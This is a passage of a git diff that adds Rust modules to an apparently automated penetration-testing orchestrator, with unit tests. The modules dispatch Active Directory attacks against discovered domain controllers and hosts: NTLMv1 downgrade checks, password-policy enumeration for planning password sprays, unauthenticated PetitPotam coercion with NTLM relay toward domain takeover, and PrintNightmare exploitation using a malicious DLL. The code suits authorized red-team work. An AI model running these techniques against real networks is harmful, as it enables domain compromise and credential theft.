{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ntlmv1_downgrade") { + continue; + } + + let work: Vec<NtlmV1Work> = { + let state = dispatcher.state.read().await; + collect_ntlmv1_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("ntlmv1_downgrade"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_NTLMV1_DOWNGRADE, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_NTLMV1_DOWNGRADE, &item.dedup_key) + .await; + + // Register ntlmv1_downgrade vulnerability proactively so it + // appears in reports without waiting for the agent's + // report_finding callback (which only logs). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ntlmv1_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ntlmv1_downgrade".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ntlmv1_downgrade".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert( + "description".to_string(), + json!("DC allows NTLMv1 authentication (LmCompatibilityLevel < 3).
NTLMv1 hashes are trivially crackable."), + ); + d + }, + recommended_agent: "credential_access".to_string(), + priority: dispatcher.effective_priority("ntlmv1_downgrade"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish NTLMv1 downgrade vulnerability"); + } + } + } + Ok(None) => { + debug!(domain = %item.domain, "NTLMv1 downgrade check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch NTLMv1 downgrade check"); + } + } + } + } +} + +struct NtlmV1Work { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert_eq!(key, "ntlmv1:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1_downgrade"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlmv1_downgrade_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn 
work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = NtlmV1Work { + dedup_key: "ntlmv1:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // NTLMv1 dedup is by DC IP, not domain + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert!(key.starts_with("ntlmv1:")); + assert!(key.contains("192.168.58.10")); + } + + // --- collect_ntlmv1_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + 
state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ntlmv1:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1:192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_dcs_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_uses_ip_not_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + 
assert!(work[0].dedup_key.starts_with("ntlmv1:")); + assert!(work[0].dedup_key.contains("192.168.58.10")); + assert!(!work[0].dedup_key.contains("contoso")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ntlmv1:{}", "192.168.58.10"); + let key2 = format!("ntlmv1:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/password_policy.rs b/ares-cli/src/orchestrator/automation/password_policy.rs new file mode 100644 index 00000000..9ae27ca8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/password_policy.rs @@ -0,0 +1,380 @@ +//! auto_password_policy -- enumerate password policy per domain. +//! +//! Password policies reveal lockout thresholds, complexity requirements, and +//! minimum lengths. This information is critical for planning password spray +//! attacks without triggering lockouts. +//! +//! Dispatches `password_policy` recon tasks per discovered domain+DC pair. 
+ +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_password_policy_work(state: &StateInner) -> Vec<PasswordPolicyWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("policy:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_PASSWORD_POLICY, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(PasswordPolicyWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Enumerates password policy on each domain controller. +/// Interval: 30s. +pub async fn auto_password_policy( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("password_policy") { + continue; + } + + let work: Vec<PasswordPolicyWork> = { + let state = dispatcher.state.read().await; + collect_password_policy_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "password_policy", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("password_policy"); + match dispatcher + .throttled_submit("recon", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Password policy enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_POLICY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_POLICY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Password policy task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch password policy enum"); + } + } + } + } +} + +struct PasswordPolicyWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() {
let key = format!("policy:{}", "contoso.local"); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PASSWORD_POLICY, "password_policy"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "password_policy", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "password_policy"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = PasswordPolicyWork { + dedup_key: "policy:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "policy:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("policy:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("policy:{}", "contoso.local"); + let key2 = format!("policy:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() 
{ + let state = StateInner::new("test-op".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = 
work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, 
"contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs new file mode 100644 index 00000000..e67ce2e8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs @@ -0,0 +1,323 @@ +//! auto_petitpotam_unauth -- attempt unauthenticated PetitPotam (MS-EFSRPC) +//! coercion against DCs. +//! +//! On unpatched systems, EfsRpcOpenFileRaw allows unauthenticated NTLM coercion. +//! This was patched in August 2021 (KB5005413) but many environments still have +//! it open. The check requires no credentials — only a listener IP and DC target. +//! +//! If successful, the captured DC machine account NTLM auth can be relayed to +//! LDAP or ADCS for domain takeover. 
+ +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect PetitPotam unauth work items from current state. +/// +/// Pure logic extracted from `auto_petitpotam_unauth` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_petitpotam_unauth_work(state: &StateInner, listener: &str) -> Vec<PetitPotamWork> { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| dc_ip.as_str() != listener) + .filter(|(_, dc_ip)| { + let dedup_key = format!("petitpotam_unauth:{dc_ip}"); + !state.is_processed(DEDUP_PETITPOTAM_UNAUTH, &dedup_key) + }) + .map(|(domain, dc_ip)| PetitPotamWork { + dedup_key: format!("petitpotam_unauth:{dc_ip}"), + domain: domain.clone(), + dc_ip: dc_ip.clone(), + listener: listener.to_string(), + }) + .collect() +} + +/// Attempts unauthenticated PetitPotam against each DC once. +/// Interval: 45s. +pub async fn auto_petitpotam_unauth( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("petitpotam_unauth") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec<PetitPotamWork> = { + let state = dispatcher.state.read().await; + collect_petitpotam_unauth_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": item.dc_ip, + "domain": item.domain, + "listener_ip": item.listener, + }); + + let priority = dispatcher.effective_priority("petitpotam_unauth"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Unauthenticated PetitPotam coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PETITPOTAM_UNAUTH, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PETITPOTAM_UNAUTH, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "PetitPotam unauth deferred"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch PetitPotam unauth"); + } + } + } + } +} + +struct PetitPotamWork { + dedup_key: String, + domain: String, + dc_ip: String, + listener: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + #[test] + fn dedup_key_format() { + let key = format!("petitpotam_unauth:{}", "192.168.58.10"); + assert_eq!(key, "petitpotam_unauth:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PETITPOTAM_UNAUTH, "petitpotam_unauth"); + } + + #[test] + fn skips_self_listener() { + let dc_ip = "192.168.58.50"; + let listener = "192.168.58.50"; + assert_eq!(dc_ip, listener); + } + + #[test] + fn no_cred_required() {
// PetitPotam unauth works without credentials + let _payload = serde_json::json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": "192.168.58.10", + "listener_ip": "192.168.58.50", + }); + // No credential field needed + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = serde_json::json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + }); + assert_eq!(payload["technique"], "petitpotam_unauthenticated"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert!(payload.get("credential").is_none()); + } + + #[test] + fn work_struct_construction() { + let work = PetitPotamWork { + dedup_key: "petitpotam_unauth:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + } + + #[test] + fn dedup_key_based_on_dc_ip() { + let dc_ip = "192.168.58.10"; + let key = format!("petitpotam_unauth:{dc_ip}"); + assert_eq!(key, "petitpotam_unauth:192.168.58.10"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("petitpotam_unauth:{}", "192.168.58.10"); + let key2 = format!("petitpotam_unauth:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn listener_excluded_from_targets() { + let dc_ip = "192.168.58.10"; + let listener = "192.168.58.50"; + assert_ne!(dc_ip, listener, "DC should not be the listener"); + + let self_target_dc = "192.168.58.50"; + assert_eq!(self_target_dc, listener, "Self-targeting should be skipped"); + } + + // --- collect_petitpotam_unauth_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = 
collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "petitpotam_unauth:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // PetitPotam unauth does NOT require credentials + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + 
.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/print_nightmare.rs b/ares-cli/src/orchestrator/automation/print_nightmare.rs new file mode 100644 index 00000000..868eb8cf --- /dev/null +++ b/ares-cli/src/orchestrator/automation/print_nightmare.rs @@ -0,0 +1,477 @@ +//! auto_print_nightmare -- exploit CVE-2021-1675 (PrintNightmare) when +//! conditions are met. +//! +//! PrintNightmare exploits the Print Spooler service to achieve remote code +//! execution. Requires: valid credentials, target with Print Spooler running +//! 
(most Windows hosts by default), and a writable SMB share for the DLL. +//! +//! This module dispatches `printnightmare` against hosts where we have +//! credentials but NOT admin access — it's a priv esc technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect PrintNightmare work items from state (pure logic, no async). +fn collect_print_nightmare_work( + state: &StateInner, + listener: &str, + dll_path: &str, +) -> Vec<PrintNightmareWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target all discovered hosts (DCs + member servers) + for host in &state.hosts { + let ip = &host.ip; + + // Skip if we already tried PrintNightmare on this host + if state.is_processed(DEDUP_PRINTNIGHTMARE, ip) { + continue; + } + + // Skip hosts where we already have admin (secretsdump handles those) + if state.is_processed(DEDUP_SECRETSDUMP, ip) { + continue; + } + + // Infer domain from hostname (e.g. "dc01.contoso.local" -> "contoso.local") + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()); + + let cred = match cred { + Some(c) => c.clone(), + None => continue, + }; + + items.push(PrintNightmareWork { + target_ip: ip.clone(), + hostname: host.hostname.clone(), + domain: domain.clone(), + listener: listener.to_string(), + dll_path: dll_path.to_string(), + credential: cred, + }); + } + + items +} + +/// Monitors for PrintNightmare exploitation opportunities. +/// Only targets hosts we don't already have admin on. +/// Interval: 45s.
+pub async fn auto_print_nightmare( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("printnightmare") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for DLL hosting + }; + + // PrintNightmare requires a UNC path to a hosted malicious DLL. Without + // pre-staged SMB share + payload infra, dispatching is guaranteed to + // fail on the worker (cve_exploits.rs requires `dll_path`). Skip + // cleanly when not configured rather than emitting failed tasks. + let dll_path = match std::env::var("ARES_PRINTNIGHTMARE_DLL").ok() { + Some(path) if !path.is_empty() => path, + _ => continue, + }; + + let work: Vec<PrintNightmareWork> = { + let state = dispatcher.state.read().await; + collect_print_nightmare_work(&state, &listener, &dll_path) + }; + + for item in work { + let payload = json!({ + "technique": "printnightmare", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "listener_ip": item.listener, + "dll_path": item.dll_path, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("printnightmare"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "PrintNightmare (CVE-2021-1675) exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PRINTNIGHTMARE, 